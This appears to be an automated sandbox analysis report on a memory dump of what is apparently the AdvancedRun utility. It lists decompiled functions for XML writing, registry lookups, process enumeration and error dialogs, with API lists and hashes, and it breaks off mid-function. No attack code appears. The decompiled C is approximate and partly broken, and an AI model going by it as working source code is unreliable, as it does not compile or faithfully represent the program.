Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<%s>, xrefs: 00407DF3
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

"%s" /EXEFilename "%%1", xrefs: 00403B8E
exefile, xrefs: 00403BAD
Advanced Run, xrefs: 00403BBE

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

general, xrefs: 00405ECB
strings, xrefs: 00405EC0
dialog_%d, xrefs: 00405EA6
menu_%d, xrefs: 00405E96

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409439
0x0040943f
0x00409445
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18
</item>, xrefs: 00407A41

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
